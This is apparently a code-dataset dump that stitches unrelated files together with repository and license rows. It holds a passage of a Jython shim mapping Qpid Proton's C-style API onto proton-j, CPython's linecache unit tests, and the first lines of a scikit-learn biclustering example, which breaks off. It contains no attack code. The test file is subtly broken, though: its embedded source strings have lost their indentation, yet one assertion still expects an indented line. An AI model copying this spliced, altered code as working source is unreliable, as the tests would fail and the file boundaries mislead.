  return wrap(conn.impl.getTransport(), pn_transport_wrapper)
class pn_session_wrapper(endpoint_wrapper):
  # Sessions carry no extra Python-side state beyond the shared
  # endpoint fields.
  pass
def pn_session(conn):
  return wrap(conn.impl.session(), pn_session_wrapper)
def pn_session_attachments(ssn):
  return ssn.attachments
def pn_session_state(ssn):
  return endpoint_state(ssn.impl)
def pn_session_get_incoming_capacity(ssn):
  return ssn.impl.getIncomingCapacity()
def pn_session_set_incoming_capacity(ssn, capacity):
  ssn.impl.setIncomingCapacity(capacity)
def pn_session_incoming_bytes(ssn):
  return ssn.impl.getIncomingBytes()
def pn_session_outgoing_bytes(ssn):
  return ssn.impl.getOutgoingBytes()
def pn_session_condition(ssn):
  # local condition; populated by callers before closing
  return ssn.condition
def pn_session_remote_condition(ssn):
  """Return the peer's error condition for this session, refreshed
  from the Java impl.

  Bug fix: previously delegated to a nonexistent module-level
  ``remote_condition`` helper and raised NameError when called.
  """
  ssn.remote_condition.decode(ssn.impl.getRemoteCondition())
  return ssn.remote_condition
def pn_session_open(ssn):
  ssn.impl.open()
def pn_session_close(ssn):
  # push any local error condition down before closing
  ssn.on_close()
  ssn.impl.close()
def mask2set(mask):
  # Expand a PN_LOCAL_*/PN_REMOTE_* bitmask back into a pair of Java
  # EnumSets (None where no bits of that half are set); inverse of
  # set2mask.
  local = []
  remote = []
  if PN_LOCAL_UNINIT & mask:
    local.append(EndpointState.UNINITIALIZED)
  if PN_LOCAL_ACTIVE & mask:
    local.append(EndpointState.ACTIVE)
  if PN_LOCAL_CLOSED & mask:
    local.append(EndpointState.CLOSED)
  if PN_REMOTE_UNINIT & mask:
    remote.append(EndpointState.UNINITIALIZED)
  if PN_REMOTE_ACTIVE & mask:
    remote.append(EndpointState.ACTIVE)
  if PN_REMOTE_CLOSED & mask:
    remote.append(EndpointState.CLOSED)
  if local:
    local = EnumSet.of(*local)
  else:
    local = None
  if remote:
    remote = EnumSet.of(*remote)
  else:
    remote = None
  return local, remote
def pn_session_head(conn, mask):
  # first session on the connection matching the given state mask
  local, remote = mask2set(mask)
  return wrap(conn.impl.sessionHead(local, remote), pn_session_wrapper)
def pn_session_connection(ssn):
  return wrap(ssn.impl.getConnection(), pn_connection_wrapper)
def pn_sender(ssn, name):
  return wrap(ssn.impl.sender(name), pn_link_wrapper)
def pn_receiver(ssn, name):
  return wrap(ssn.impl.receiver(name), pn_link_wrapper)
def pn_session_free(ssn):
  ssn.impl.free()
# Terminus type <-> Java terminus class mappings; the P2J values are
# callables so PN_UNSPECIFIED can produce None.
TERMINUS_TYPES_J2P = {
  Source: PN_SOURCE,
  Target: PN_TARGET,
  Coordinator: PN_COORDINATOR,
  None.__class__: PN_UNSPECIFIED
}
TERMINUS_TYPES_P2J = {
  PN_SOURCE: Source,
  PN_TARGET: Target,
  PN_COORDINATOR: Coordinator,
  PN_UNSPECIFIED: lambda: None
}
# Durability level <-> Java TerminusDurability mappings.
DURABILITY_P2J = {
  PN_NONDURABLE: TerminusDurability.NONE,
  PN_CONFIGURATION: TerminusDurability.CONFIGURATION,
  PN_DELIVERIES: TerminusDurability.UNSETTLED_STATE
}
DURABILITY_J2P = {
  TerminusDurability.NONE: PN_NONDURABLE,
  TerminusDurability.CONFIGURATION: PN_CONFIGURATION,
  TerminusDurability.UNSETTLED_STATE: PN_DELIVERIES
}
# Expiry policy <-> Java TerminusExpiryPolicy mappings.
EXPIRY_POLICY_P2J = {
  PN_EXPIRE_WITH_LINK: TerminusExpiryPolicy.LINK_DETACH,
  PN_EXPIRE_WITH_SESSION: TerminusExpiryPolicy.SESSION_END,
  PN_EXPIRE_WITH_CONNECTION: TerminusExpiryPolicy.CONNECTION_CLOSE,
  PN_EXPIRE_NEVER: TerminusExpiryPolicy.NEVER
}
EXPIRY_POLICY_J2P = {
  TerminusExpiryPolicy.LINK_DETACH: PN_EXPIRE_WITH_LINK,
  TerminusExpiryPolicy.SESSION_END: PN_EXPIRE_WITH_SESSION,
  TerminusExpiryPolicy.CONNECTION_CLOSE: PN_EXPIRE_WITH_CONNECTION,
  TerminusExpiryPolicy.NEVER: PN_EXPIRE_NEVER
}
# Distribution mode <-> AMQP symbol mappings (unspecified maps to None).
DISTRIBUTION_MODE_P2J = {
  PN_DIST_MODE_UNSPECIFIED: None,
  PN_DIST_MODE_COPY: Symbol.valueOf("copy"),
  PN_DIST_MODE_MOVE: Symbol.valueOf("move")
}
DISTRIBUTION_MODE_J2P = {
  None: PN_DIST_MODE_UNSPECIFIED,
  Symbol.valueOf("copy"): PN_DIST_MODE_COPY,
  Symbol.valueOf("move"): PN_DIST_MODE_MOVE
}
class pn_terminus:
  """Python-side mirror of a link terminus (source, target or
  transaction coordinator), convertible to and from the Java terminus
  classes via decode()/encode()."""
  def __init__(self, type):
    self.type = type
    self.address = None
    self.durability = PN_NONDURABLE
    self.expiry_policy = PN_EXPIRE_WITH_SESSION
    self.distribution_mode = PN_DIST_MODE_UNSPECIFIED
    self.timeout = 0
    self.dynamic = False
    self.properties = pn_data(0)
    self.capabilities = pn_data(0)
    self.outcomes = pn_data(0)
    self.filter = pn_data(0)
  def copy(self, src):
    """Copy all terminus state from *src* onto this terminus.

    Bug fix: ``distribution_mode`` was previously not copied, so
    copying a source terminus silently dropped its copy/move setting.
    """
    self.type = src.type
    self.address = src.address
    self.durability = src.durability
    self.expiry_policy = src.expiry_policy
    self.distribution_mode = src.distribution_mode
    self.timeout = src.timeout
    self.dynamic = src.dynamic
    # NOTE(review): the pn_data members are shared by reference rather
    # than deep-copied, matching the original behaviour.
    self.properties = src.properties
    self.capabilities = src.capabilities
    self.outcomes = src.outcomes
    self.filter = src.filter
  def decode(self, impl):
    # Populate from a Java terminus (Source/Target/Coordinator or None);
    # a None impl leaves the current state untouched.
    if impl is not None:
      self.type = TERMINUS_TYPES_J2P[impl.__class__]
      if self.type in (PN_SOURCE, PN_TARGET):
        self.address = impl.getAddress()
        self.durability = DURABILITY_J2P[impl.getDurable()]
        self.expiry_policy = EXPIRY_POLICY_J2P[impl.getExpiryPolicy()]
        self.timeout = impl.getTimeout().longValue()
        self.dynamic = impl.getDynamic()
        obj2dat(impl.getDynamicNodeProperties(), self.properties)
        array2dat(impl.getCapabilities(), PN_SYMBOL, self.capabilities)
      if self.type == PN_SOURCE:
        self.distribution_mode = DISTRIBUTION_MODE_J2P[impl.getDistributionMode()]
        array2dat(impl.getOutcomes(), PN_SYMBOL, self.outcomes)
        obj2dat(impl.getFilter(), self.filter)
  def encode(self):
    # Build the corresponding Java terminus (None for PN_UNSPECIFIED).
    impl = TERMINUS_TYPES_P2J[self.type]()
    if self.type in (PN_SOURCE, PN_TARGET):
      impl.setAddress(self.address)
      impl.setDurable(DURABILITY_P2J[self.durability])
      impl.setExpiryPolicy(EXPIRY_POLICY_P2J[self.expiry_policy])
      impl.setTimeout(UnsignedInteger.valueOf(self.timeout))
      impl.setDynamic(self.dynamic)
      props = dat2obj(self.properties)
      caps = dat2obj(self.capabilities)
      if props: impl.setDynamicNodeProperties(props)
      if caps:
        impl.setCapabilities(*array(list(caps), Symbol))
      if self.type == PN_SOURCE:
        impl.setDistributionMode(DISTRIBUTION_MODE_P2J[self.distribution_mode])
        outcomes = dat2obj(self.outcomes)
        filter = dat2obj(self.filter)
        if outcomes: impl.setOutcomes(outcomes)
        if filter: impl.setFilter(filter)
    return impl
# C-style accessors over pn_terminus; setters return 0 to mirror the C
# API's success/error codes.
def pn_terminus_get_type(terminus):
  return terminus.type
def pn_terminus_set_type(terminus, type):
  terminus.type = type
  return 0
def pn_terminus_get_address(terminus):
  return terminus.address
def pn_terminus_set_address(terminus, address):
  terminus.address = address
  return 0
def pn_terminus_get_durability(terminus):
  return terminus.durability
def pn_terminus_get_expiry_policy(terminus):
  return terminus.expiry_policy
def pn_terminus_set_timeout(terminus, timeout):
  terminus.timeout = timeout
  return 0
def pn_terminus_get_timeout(terminus):
  return terminus.timeout
def pn_terminus_get_distribution_mode(terminus):
  return terminus.distribution_mode
def pn_terminus_set_distribution_mode(terminus, mode):
  terminus.distribution_mode = mode
  return 0
def pn_terminus_is_dynamic(terminus):
  return terminus.dynamic
def pn_terminus_set_dynamic(terminus, dynamic):
  terminus.dynamic = dynamic
  return 0
def pn_terminus_properties(terminus):
  return terminus.properties
def pn_terminus_capabilities(terminus):
  return terminus.capabilities
def pn_terminus_outcomes(terminus):
  return terminus.outcomes
def pn_terminus_filter(terminus):
  return terminus.filter
def pn_terminus_copy(terminus, src):
  terminus.copy(src)
  return 0
class pn_link_wrapper(endpoint_wrapper):
  # Tracks the locally configured and remotely advertised termini in
  # addition to the shared endpoint state.
  def __init__(self, impl):
    endpoint_wrapper.__init__(self, impl)
    self.source = pn_terminus(PN_SOURCE)
    self.remote_source = pn_terminus(PN_UNSPECIFIED)
    self.target = pn_terminus(PN_TARGET)
    self.remote_target = pn_terminus(PN_UNSPECIFIED)
  def on_open(self):
    # push the locally staged termini down to the Java link just before
    # the link is opened
    self.impl.setSource(self.source.encode())
    self.impl.setTarget(self.target.encode())
def pn_link_attachments(link):
  return link.attachments
def pn_link_source(link):
  # refresh from the Java impl so callers see current state
  link.source.decode(link.impl.getSource())
  return link.source
def pn_link_remote_source(link):
  link.remote_source.decode(link.impl.getRemoteSource())
  return link.remote_source
def pn_link_target(link):
  link.target.decode(link.impl.getTarget())
  return link.target
def pn_link_remote_target(link):
  link.remote_target.decode(link.impl.getRemoteTarget())
  return link.remote_target
def pn_link_condition(link):
  # local condition; populated by callers before closing
  return link.condition
def pn_link_remote_condition(link):
  """Return the peer's error condition for this link, refreshed from
  the Java impl.

  Bug fix: previously delegated to a nonexistent module-level
  ``remote_condition`` helper and raised NameError when called.
  """
  link.remote_condition.decode(link.impl.getRemoteCondition())
  return link.remote_condition
# Sender settle mode <-> Java enum mappings (None passes through so an
# unset mode stays unset).
SND_SETTLE_MODE_P2J = {
  PN_SND_UNSETTLED: SenderSettleMode.UNSETTLED,
  PN_SND_SETTLED: SenderSettleMode.SETTLED,
  PN_SND_MIXED: SenderSettleMode.MIXED,
  None: None
}
SND_SETTLE_MODE_J2P = {
  SenderSettleMode.UNSETTLED: PN_SND_UNSETTLED,
  SenderSettleMode.SETTLED: PN_SND_SETTLED,
  SenderSettleMode.MIXED: PN_SND_MIXED,
  None: None
}
def pn_link_set_snd_settle_mode(link, mode):
  link.impl.setSenderSettleMode(SND_SETTLE_MODE_P2J[mode])
def pn_link_snd_settle_mode(link):
  return SND_SETTLE_MODE_J2P[link.impl.getSenderSettleMode()]
def pn_link_remote_snd_settle_mode(link):
  return SND_SETTLE_MODE_J2P[link.impl.getRemoteSenderSettleMode()]
# Receiver settle mode <-> Java enum mappings.
RCV_SETTLE_MODE_P2J = {
  PN_RCV_FIRST: ReceiverSettleMode.FIRST,
  PN_RCV_SECOND: ReceiverSettleMode.SECOND,
  None: None
}
RCV_SETTLE_MODE_J2P = {
  ReceiverSettleMode.FIRST: PN_RCV_FIRST,
  ReceiverSettleMode.SECOND: PN_RCV_SECOND,
  None: None
}
def pn_link_set_rcv_settle_mode(link, mode):
  link.impl.setReceiverSettleMode(RCV_SETTLE_MODE_P2J[mode])
def pn_link_rcv_settle_mode(link):
  return RCV_SETTLE_MODE_J2P[link.impl.getReceiverSettleMode()]
def pn_link_remote_rcv_settle_mode(link):
  return RCV_SETTLE_MODE_J2P[link.impl.getRemoteReceiverSettleMode()]
def pn_link_is_sender(link):
  return isinstance(link.impl, Sender)
def pn_link_is_receiver(link):
  return isinstance(link.impl, Receiver)
def pn_link_head(conn, mask):
  # first link on the connection matching the given state mask
  local, remote = mask2set(mask)
  return wrap(conn.impl.linkHead(local, remote), pn_link_wrapper)
def pn_link_next(link, mask):
  local, remote = mask2set(mask)
  return wrap(link.impl.next(local, remote), pn_link_wrapper)
def pn_link_session(link):
  return wrap(link.impl.getSession(), pn_session_wrapper)
def pn_link_state(link):
  return endpoint_state(link.impl)
def pn_link_name(link):
  return link.impl.getName()
def pn_link_open(link):
  # push the staged termini first (see pn_link_wrapper.on_open)
  link.on_open()
  link.impl.open()
def pn_link_close(link):
  link.on_close()
  link.impl.close()
def pn_link_detach(link):
  link.on_close()
  link.impl.detach()
def pn_link_flow(link, n):
  link.impl.flow(n)
def pn_link_drain(link, n):
  link.impl.drain(n)
def pn_link_drained(link):
  return link.impl.drained()
def pn_link_draining(link):
  return link.impl.draining()
def pn_link_credit(link):
  return link.impl.getCredit()
def pn_link_queued(link):
  return link.impl.getQueued()
def pn_link_unsettled(link):
  return link.impl.getUnsettled()
def pn_link_send(link, bytes):
  # copy the Python byte string into a Java byte[] for the engine
  return link.impl.send(array(bytes, 'b'), 0, len(bytes))
def pn_link_recv(link, limit):
  # Returns (n, bytes): n is the engine's return code (byte count or a
  # negative error/EOS code); bytes is None when n is negative.
  ary = zeros(limit, 'b')
  n = link.impl.recv(ary, 0, limit)
  if n >= 0:
    bytes = ary[:n].tostring()
  else:
    bytes = None
  return n, bytes
def pn_link_advance(link):
  return link.impl.advance()
def pn_link_current(link):
  return wrap(link.impl.current(), pn_delivery_wrapper)
def pn_link_free(link):
  link.impl.free()
def pn_work_head(conn):
  # first delivery on the connection's work queue
  return wrap(conn.impl.getWorkHead(), pn_delivery_wrapper)
def pn_work_next(dlv):
  return wrap(dlv.impl.getWorkNext(), pn_delivery_wrapper)
# Delivery state class <-> descriptor code mappings; the DISPOSITIONS
# values are callables so code 0 can produce None.
DELIVERY_STATES = {
  Received: PN_RECEIVED,
  Accepted: PN_ACCEPTED,
  Rejected: PN_REJECTED,
  Released: PN_RELEASED,
  Modified: PN_MODIFIED,
  None.__class__: 0
}
DISPOSITIONS = {
  PN_RECEIVED: Received,
  PN_ACCEPTED: Accepted,
  PN_REJECTED: Rejected,
  PN_RELEASED: Released,
  PN_MODIFIED: Modified,
  0: lambda: None
}
class pn_disposition:
  # Python-side mirror of a delivery disposition: the outcome type plus
  # the union of all outcome-specific fields (rejected condition,
  # modified flags/annotations, received section bookkeeping).
  def __init__(self):
    self.type = 0
    self.data = pn_data(0)
    self.failed = False
    self.undeliverable = False
    self.annotations = pn_data(0)
    self.condition = pn_condition()
    self.section_number = 0
    self.section_offset = 0
  def decode(self, impl):
    # Populate from a Java delivery state; fields that do not apply to
    # the decoded outcome type are reset to their defaults.
    self.type = DELIVERY_STATES[impl.__class__]
    if self.type == PN_REJECTED:
      self.condition.decode(impl.getError())
    else:
      pn_condition_clear(self.condition)
    if self.type == PN_MODIFIED:
      self.failed = impl.getDeliveryFailed()
      self.undeliverable = impl.getUndeliverableHere()
      obj2dat(impl.getMessageAnnotations(), self.annotations)
    else:
      self.failed = False
      self.undeliverable = False
      pn_data_clear(self.annotations)
    if self.type == PN_RECEIVED:
      self.section_number = impl.getSectionNumber().longValue()
      self.section_offset = impl.getSectionOffset().longValue()
    else:
      self.section_number = 0
      self.section_offset = 0
    # raw disposition data is not decoded yet (see the XXX below)
    self.data.clear()
    if impl:
      # XXX
      #self.data.putObject(impl)
      pass
    self.data.rewind()
  def encode(self):
    # Build the Java delivery state: unknown types raise Skipped, type 0
    # encodes as None.
    if self.type not in DISPOSITIONS:
      raise Skipped()
    impl = DISPOSITIONS[self.type]()
    if impl is None:
      return impl
    if self.type == PN_REJECTED:
      impl.setError(self.condition.encode())
    if self.type == PN_MODIFIED:
      impl.setDeliveryFailed(self.failed)
      impl.setUndeliverableHere(self.undeliverable)
      ann = dat2obj(self.annotations)
      if ann: impl.setMessageAnnotations(ann)
    if self.type == PN_RECEIVED:
      if self.section_number:
        impl.setSectionNumber(UnsignedInteger.valueOf(self.section_number))
      if self.section_offset:
        impl.setSectionOffset(UnsignedLong.valueOf(self.section_offset))
    return impl
# Plain accessors over pn_disposition, mirroring the C API.
def pn_disposition_type(dsp):
  return dsp.type
def pn_disposition_is_failed(dsp):
  return dsp.failed
def pn_disposition_set_failed(dsp, failed):
  dsp.failed = failed
def pn_disposition_is_undeliverable(dsp):
  return dsp.undeliverable
def pn_disposition_set_undeliverable(dsp, undeliverable):
  dsp.undeliverable = undeliverable
def pn_disposition_data(dsp):
  return dsp.data
def pn_disposition_annotations(dsp):
  return dsp.annotations
def pn_disposition_condition(dsp):
  return dsp.condition
def pn_disposition_get_section_number(dsp):
  return dsp.section_number
def pn_disposition_set_section_number(dsp, number):
  dsp.section_number = number
def pn_disposition_get_section_offset(dsp):
  return dsp.section_offset
def pn_disposition_set_section_offset(dsp, offset):
  dsp.section_offset = offset
class pn_delivery_wrapper:
  # Pairs the Java delivery with its cached local and remote
  # dispositions and a per-delivery attachments dict.
  def __init__(self, impl):
    self.impl = impl
    self.attachments = {}
    self.local = pn_disposition()
    self.remote = pn_disposition()
def pn_delivery(link, tag):
  # tag is a Python byte string; convert to a Java byte[]
  return wrap(link.impl.delivery(array(tag, 'b')), pn_delivery_wrapper)
def pn_delivery_tag(dlv):
  return dlv.impl.getTag().tostring()
def pn_delivery_attachments(dlv):
  return dlv.attachments
def pn_delivery_partial(dlv):
  return dlv.impl.isPartial()
def pn_delivery_pending(dlv):
  return dlv.impl.pending()
def pn_delivery_writable(dlv):
  return dlv.impl.isWritable()
def pn_delivery_readable(dlv):
  return dlv.impl.isReadable()
def pn_delivery_updated(dlv):
  return dlv.impl.isUpdated()
def pn_delivery_settled(dlv):
  return dlv.impl.remotelySettled()
def pn_delivery_local(dlv):
  # refresh the cached local disposition before handing it out
  dlv.local.decode(dlv.impl.getLocalState())
  return dlv.local
def pn_delivery_local_state(dlv):
  dlv.local.decode(dlv.impl.getLocalState())
  return dlv.local.type
def pn_delivery_remote(dlv):
  dlv.remote.decode(dlv.impl.getRemoteState())
  return dlv.remote
def pn_delivery_remote_state(dlv):
  dlv.remote.decode(dlv.impl.getRemoteState())
  return dlv.remote.type
def pn_delivery_update(dlv, state):
  # set the local outcome type, then push the encoded disposition down
  dlv.local.type = state
  dlv.impl.disposition(dlv.local.encode())
def pn_delivery_link(dlv):
  return wrap(dlv.impl.getLink(), pn_link_wrapper)
def pn_delivery_settle(dlv):
  dlv.impl.settle()
class pn_transport_wrapper:
  # Pairs the Java transport with its attachments, a server flag kept
  # only on the Python side, and a cached condition.
  def __init__(self, impl):
    self.impl = impl
    self.attachments = {}
    self.server = False
    self.condition = pn_condition()
def pn_transport():
  return wrap(Proton.transport(), pn_transport_wrapper)
def pn_transport_attachments(trans):
  return trans.attachments
def pn_transport_set_server(trans):
  # only recorded on the wrapper; nothing is forwarded to the Java impl
  trans.server = True;
def pn_transport_get_max_frame(trans):
  return trans.impl.getMaxFrameSize()
def pn_transport_set_max_frame(trans, value):
  trans.impl.setMaxFrameSize(value)
def pn_transport_get_remote_max_frame(trans):
  return trans.impl.getRemoteMaxFrameSize()
def pn_transport_set_idle_timeout(trans, value):
  trans.impl.setIdleTimeout(value);
def pn_transport_get_idle_timeout(trans):
  return trans.impl.getIdleTimeout()
def pn_transport_get_remote_idle_timeout(trans):
  return trans.impl.getRemoteIdleTimeout()
def pn_transport_get_frames_input(trans):
  # not implemented by this shim
  raise Skipped()
def pn_transport_set_channel_max(trans, n):
  trans.impl.setChannelMax(n)
def pn_transport_get_channel_max(trans):
  return trans.impl.getChannelMax()
def pn_transport_remote_channel_max(trans):
  return trans.impl.getRemoteChannelMax()
def pn_transport_tick(trans, now):
  return trans.impl.tick(now);
def pn_transport_bind(trans, conn):
  trans.impl.bind(conn.impl)
  return 0
def pn_transport_unbind(trans):
  trans.impl.unbind()
  return 0
def pn_transport_trace(trans, n):
  trans.impl.trace(n)
def pn_transport_pending(trans):
  return trans.impl.pending()
def pn_transport_peek(trans, size):
  # Copy up to `size` pending output bytes without consuming them;
  # returns (0, bytes).  The buffer position is rewound after reading.
  size = min(trans.impl.pending(), size)
  ba = zeros(size, 'b')
  if size:
    bb = trans.impl.head()
    bb.get(ba)
    bb.position(0)
  return 0, ba.tostring()
def pn_transport_pop(trans, size):
  trans.impl.pop(size)
def pn_transport_capacity(trans):
  return trans.impl.capacity()
def pn_transport_push(trans, input):
  # Feed up to capacity() bytes of input into the transport; returns the
  # number of bytes consumed, or the (negative) capacity error code.
  cap = pn_transport_capacity(trans)
  if cap < 0:
    return cap
  elif len(input) > cap:
    input = input[:cap]
  bb = trans.impl.tail()
  bb.put(array(input, 'b'))
  trans.impl.process()
  return len(input)
# NOTE(review): close_head/close_tail look like C-style method names
# being invoked on the Java transport -- confirm they exist on the
# proton-j Transport interface in use.
def pn_transport_close_head(trans):
  trans.impl.close_head()
  return 0
def pn_transport_close_tail(trans):
  trans.impl.close_tail()
  return 0
def pn_transport_closed(trans):
  return trans.impl.isClosed()
def pn_transport_condition(trans):
  # refresh the cached condition from the Java impl before returning it
  trans.condition.decode(trans.impl.getCondition())
  return trans.condition
from org.apache.qpid.proton.engine import Event
# C-style PN_* event type constants, aliased directly to the Java
# Event.Type enum members.
PN_REACTOR_INIT = Event.Type.REACTOR_INIT
PN_REACTOR_QUIESCED = Event.Type.REACTOR_QUIESCED
PN_REACTOR_FINAL = Event.Type.REACTOR_FINAL
PN_TIMER_TASK = Event.Type.TIMER_TASK
PN_CONNECTION_INIT = Event.Type.CONNECTION_INIT
PN_CONNECTION_BOUND = Event.Type.CONNECTION_BOUND
PN_CONNECTION_UNBOUND = Event.Type.CONNECTION_UNBOUND
PN_CONNECTION_LOCAL_OPEN = Event.Type.CONNECTION_LOCAL_OPEN
PN_CONNECTION_REMOTE_OPEN = Event.Type.CONNECTION_REMOTE_OPEN
PN_CONNECTION_LOCAL_CLOSE = Event.Type.CONNECTION_LOCAL_CLOSE
PN_CONNECTION_REMOTE_CLOSE = Event.Type.CONNECTION_REMOTE_CLOSE
PN_CONNECTION_FINAL = Event.Type.CONNECTION_FINAL
PN_SESSION_INIT = Event.Type.SESSION_INIT
PN_SESSION_LOCAL_OPEN = Event.Type.SESSION_LOCAL_OPEN
PN_SESSION_REMOTE_OPEN = Event.Type.SESSION_REMOTE_OPEN
PN_SESSION_LOCAL_CLOSE = Event.Type.SESSION_LOCAL_CLOSE
PN_SESSION_REMOTE_CLOSE = Event.Type.SESSION_REMOTE_CLOSE
PN_SESSION_FINAL = Event.Type.SESSION_FINAL
PN_LINK_INIT = Event.Type.LINK_INIT
PN_LINK_LOCAL_OPEN = Event.Type.LINK_LOCAL_OPEN
PN_LINK_REMOTE_OPEN = Event.Type.LINK_REMOTE_OPEN
PN_LINK_LOCAL_CLOSE = Event.Type.LINK_LOCAL_CLOSE
PN_LINK_REMOTE_CLOSE = Event.Type.LINK_REMOTE_CLOSE
PN_LINK_LOCAL_DETACH = Event.Type.LINK_LOCAL_DETACH
PN_LINK_REMOTE_DETACH = Event.Type.LINK_REMOTE_DETACH
PN_LINK_FLOW = Event.Type.LINK_FLOW
PN_LINK_FINAL = Event.Type.LINK_FINAL
PN_DELIVERY = Event.Type.DELIVERY
PN_TRANSPORT = Event.Type.TRANSPORT
PN_TRANSPORT_ERROR = Event.Type.TRANSPORT_ERROR
PN_TRANSPORT_HEAD_CLOSED = Event.Type.TRANSPORT_HEAD_CLOSED
PN_TRANSPORT_TAIL_CLOSED = Event.Type.TRANSPORT_TAIL_CLOSED
PN_TRANSPORT_CLOSED = Event.Type.TRANSPORT_CLOSED
PN_SELECTABLE_INIT = Event.Type.SELECTABLE_INIT
PN_SELECTABLE_UPDATED = Event.Type.SELECTABLE_UPDATED
PN_SELECTABLE_READABLE = Event.Type.SELECTABLE_READABLE
PN_SELECTABLE_WRITABLE = Event.Type.SELECTABLE_WRITABLE
PN_SELECTABLE_EXPIRED = Event.Type.SELECTABLE_EXPIRED
PN_SELECTABLE_ERROR = Event.Type.SELECTABLE_ERROR
PN_SELECTABLE_FINAL = Event.Type.SELECTABLE_FINAL
def pn_collector():
  return Proton.collector()
def pn_connection_collect(conn, coll):
  # route the connection's engine events into the given collector
  conn.impl.collect(coll)
class pn_event:
  """Wraps a copied Java Event together with a per-event attachments
  dict."""
  def __init__(self, impl):
    self.impl = impl
    self.attachments = {}

def pn_collector_peek(coll):
  """Return the head event of *coll* wrapped as a pn_event (the
  underlying Java event is copied), or None if the collector is
  empty."""
  head = coll.peek()
  return pn_event(head.copy()) if head else None

def pn_collector_pop(coll):
  """Discard the collector's head event."""
  coll.pop()

def pn_collector_free(coll):
  """No-op: the Java collector is reclaimed by garbage collection."""
  pass
def pn_event_reactor(event):
  # reactors are not supported by this shim
  return None
def pn_event_connection(event):
  return wrap(event.impl.getConnection(), pn_connection_wrapper)
def pn_event_session(event):
  return wrap(event.impl.getSession(), pn_session_wrapper)
def pn_event_link(event):
  return wrap(event.impl.getLink(), pn_link_wrapper)
def pn_event_delivery(event):
  return wrap(event.impl.getDelivery(), pn_delivery_wrapper)
def pn_event_transport(event):
  return wrap(event.impl.getTransport(), pn_transport_wrapper)
from org.apache.qpid.proton.engine.impl import ConnectionImpl, SessionImpl, \
SenderImpl, ReceiverImpl, DeliveryImpl, TransportImpl
# Java impl class -> C-style class name used by pn_event_class, and the
# matching wrapper factories used by pn_event_context.
J2C = {
  ConnectionImpl: "pn_connection",
  SessionImpl: "pn_session",
  SenderImpl: "pn_link",
  ReceiverImpl: "pn_link",
  DeliveryImpl: "pn_delivery",
  TransportImpl: "pn_transport"
}
wrappers = {
  "pn_connection": lambda x: wrap(x, pn_connection_wrapper),
  "pn_session": lambda x: wrap(x, pn_session_wrapper),
  "pn_link": lambda x: wrap(x, pn_link_wrapper),
  "pn_delivery": lambda x: wrap(x, pn_delivery_wrapper),
  "pn_transport": lambda x: wrap(x, pn_transport_wrapper),
  "pn_void": lambda x: x
}
def pn_event_class(event):
  # C-style class name of the event's context object ("pn_void" for
  # anything unrecognized)
  ctx = event.impl.getContext()
  return J2C.get(ctx.getClass(), "pn_void")
def pn_event_context(event):
  return wrappers[pn_event_class(event)](event.impl.getContext())
def pn_event_type(event):
  return event.impl.getType()
def pn_event_type_name(etype):
  return str(etype)
def pn_event_category(event):
  return event.impl.getCategory()
def pn_event_attachments(event):
  return event.attachments
| apache-2.0 |
ShiYw/Sigil | 3rdparty/python/Lib/test/test_linecache.py | 107 | 4133 | """ Tests for the linecache module """
import linecache
import unittest
import os.path
from test import support
FILENAME = linecache.__file__
INVALID_NAME = '!@$)(!@#_1'
EMPTY = ''
TESTS = 'inspect_fodder inspect_fodder2 mapping_tests'
TESTS = TESTS.split()
TEST_PATH = os.path.dirname(__file__)
MODULES = "linecache abc".split()
MODULE_PATH = os.path.dirname(FILENAME)
SOURCE_1 = '''
" Docstring "
def function():
return result
'''
SOURCE_2 = '''
def f():
return 1 + 1
a = f()
'''
SOURCE_3 = '''
def f():
return 3''' # No ending newline
class LineCacheTests(unittest.TestCase):
    """Behavioural tests for linecache.getline/getlines/clearcache/checkcache."""
    def test_getline(self):
        """getline returns exact file lines and '' for any bad input."""
        getline = linecache.getline
        # Bad values for line number should return an empty string
        self.assertEqual(getline(FILENAME, 2**15), EMPTY)
        self.assertEqual(getline(FILENAME, -1), EMPTY)
        # Float values currently raise TypeError, should it?
        self.assertRaises(TypeError, getline, FILENAME, 1.1)
        # Bad filenames should return an empty string
        self.assertEqual(getline(EMPTY, 1), EMPTY)
        self.assertEqual(getline(INVALID_NAME, 1), EMPTY)
        # Check whether lines correspond to those from file iteration
        for entry in TESTS:
            filename = os.path.join(TEST_PATH, entry) + '.py'
            with open(filename) as file:
                for index, line in enumerate(file):
                    self.assertEqual(line, getline(filename, index + 1))
        # Check module loading
        for entry in MODULES:
            filename = os.path.join(MODULE_PATH, entry) + '.py'
            with open(filename) as file:
                for index, line in enumerate(file):
                    self.assertEqual(line, getline(filename, index + 1))
        # Check that bogus data isn't returned (issue #1309567)
        empty = linecache.getlines('a/b/c/__init__.py')
        self.assertEqual(empty, [])
    def test_no_ending_newline(self):
        """getlines appends a newline to a file lacking a final one."""
        self.addCleanup(support.unlink, support.TESTFN)
        with open(support.TESTFN, "w") as fp:
            fp.write(SOURCE_3)
        lines = linecache.getlines(support.TESTFN)
        self.assertEqual(lines, ["\n", "def f():\n", "    return 3\n"])
    def test_clearcache(self):
        """clearcache empties the module-level cache dict."""
        cached = []
        for entry in TESTS:
            filename = os.path.join(TEST_PATH, entry) + '.py'
            cached.append(filename)
            linecache.getline(filename, 1)
        # Are all files cached?
        cached_empty = [fn for fn in cached if fn not in linecache.cache]
        self.assertEqual(cached_empty, [])
        # Can we clear the cache?
        linecache.clearcache()
        cached_empty = [fn for fn in cached if fn in linecache.cache]
        self.assertEqual(cached_empty, [])
    def test_checkcache(self):
        """checkcache refreshes stale entries only for the given file."""
        getline = linecache.getline
        # Create a source file and cache its contents
        source_name = support.TESTFN + '.py'
        self.addCleanup(support.unlink, source_name)
        with open(source_name, 'w') as source:
            source.write(SOURCE_1)
        getline(source_name, 1)
        # Keep a copy of the old contents
        source_list = []
        with open(source_name) as source:
            for index, line in enumerate(source):
                self.assertEqual(line, getline(source_name, index + 1))
                source_list.append(line)
        with open(source_name, 'w') as source:
            source.write(SOURCE_2)
        # Try to update a bogus cache entry
        linecache.checkcache('dummy')
        # Check that the cache matches the old contents
        for index, line in enumerate(source_list):
            self.assertEqual(line, getline(source_name, index + 1))
        # Update the cache and check whether it matches the new source file
        linecache.checkcache(source_name)
        with open(source_name) as source:
            for index, line in enumerate(source):
                self.assertEqual(line, getline(source_name, index + 1))
                source_list.append(line)
def test_main():
    # Entry point used by regrtest: run the whole LineCacheTests suite.
    support.run_unittest(LineCacheTests)


if __name__ == "__main__":
    test_main()
| gpl-3.0 |
ssaeger/scikit-learn | examples/bicluster/bicluster_newsgroups.py | 142 | 7183 | """
================================================================
Biclustering documents with the Spectral Co-clustering algorithm
================================================================
This example demonstrates the Spectral Co-clustering algorithm on the
